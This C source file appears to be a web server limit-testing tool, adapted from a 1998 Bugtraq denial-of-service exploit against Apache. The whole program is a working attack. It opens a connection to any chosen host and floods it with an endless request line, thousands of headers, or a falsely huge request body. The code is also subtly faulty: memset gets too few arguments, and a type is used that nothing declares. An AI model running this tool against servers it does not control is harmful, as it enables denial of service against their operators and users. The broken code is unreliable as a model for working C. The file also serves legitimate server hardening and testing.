/************************************************************** * test_limits.c * * A simple program for sending abusive requests to a server, based * on the sioux.c exploit code that this nimrod posted (see below). * Roy added options for testing long header fieldsize (-t h), long * request-lines (-t r), and a long request body (-t b). * * FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2: * gcc -o test_limits test_limits.c * * Solaris 2.5.1: * gcc -o test_limits test_limits.c -lsocket -lnsl * * * Message-ID: <861zqspvtw.fsf@niobe.ewox.org> * Date: Fri, 7 Aug 1998 19:04:27 +0200 * Sender: Bugtraq List <BUGTRAQ@netspace.org> * From: Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG> * Subject: YA Apache DoS attack * * Copyright (c) 1998 Dag-Erling Codan Smrgrav * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer * in this position and unchanged. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software withough specific prior written permission * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * */ /* * Kudos to Mark Huizer who originally suggested this on freebsd-current */ #include <sys/types.h> #include <sys/uio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define TEST_LONG_REQUEST_LINE 1 #define TEST_LONG_REQUEST_FIELDS 2 #define TEST_LONG_REQUEST_FIELDSIZE 3 #define TEST_LONG_REQUEST_BODY 4 void usage(void) { fprintf(stderr, "usage: test_limits [-t (r|n|h|b)] [-a address] [-p port] [-n num]\n"); exit(1); } int main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *f; int o, sd; /* default parameters */ char *addr = "localhost"; int port = 80; int num = 1000; int testtype = TEST_LONG_REQUEST_FIELDS; /* get options */ while ((o = getopt(argc, argv, "t:a:p:n:")) != EOF) switch (o) { case 't': if (*optarg == 'r') testtype = TEST_LONG_REQUEST_LINE; else if (*optarg == 'n') testtype = TEST_LONG_REQUEST_FIELDS; else if (*optarg == 'h') testtype = TEST_LONG_REQUEST_FIELDSIZE; else if (*optarg == 'b') testtype = TEST_LONG_REQUEST_BODY; break; case 'a': addr = optarg; break; case 'p': port = atoi(optarg); break; case 'n': num = atoi(optarg); break; default: usage(); } if (argc != optind) usage(); /* connect */ if ((he = gethostbyname(addr)) == NULL) { perror("gethostbyname"); exit(1); } memset(&sin, sizeof(sin)); memcpy((char *)&sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = he->h_addrtype; sin.sin_port = htons(port); if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connect"); exit(1); } if ((f = fdopen(sd, "r+")) == NULL) { perror("fdopen"); exit(1); } /* attack! */ fprintf(stderr, "Testing like a plague of locusts on %s\n", addr); if (testtype == TEST_LONG_REQUEST_LINE) { fprintf(f, "GET "); while (num-- && !ferror(f)) { fprintf(f, "/123456789"); fflush(f); } fprintf(f, " HTTP/1.0\r\n\r\n"); } else { fprintf(f, "GET /fred/foo HTTP/1.0\r\n"); if (testtype == TEST_LONG_REQUEST_FIELDSIZE) { while (num-- && !ferror(f)) { fprintf(f, "User-Agent: sioux"); fflush(f); } fprintf(f, "\r\n"); } else if (testtype == TEST_LONG_REQUEST_FIELDS) { while (num-- && !ferror(f)) fprintf(f, "User-Agent: sioux\r\n"); fprintf(f, "\r\n"); } else if (testtype == TEST_LONG_REQUEST_BODY) { fprintf(f, "User-Agent: sioux\r\n"); fprintf(f, "Content-Length: 33554433\r\n"); fprintf(f, "\r\n"); while (num-- && !ferror(f)) fprintf(f, "User-Agent: sioux\r\n"); } else { fprintf(f, "\r\n"); } } fflush(f); { apr_ssize_t len; char buff[512]; while ((len = read(sd, buff, 512)) > 0) len = write(1, buff, len); } if (ferror(f)) { perror("fprintf"); exit(1); } fclose(f); exit(0); }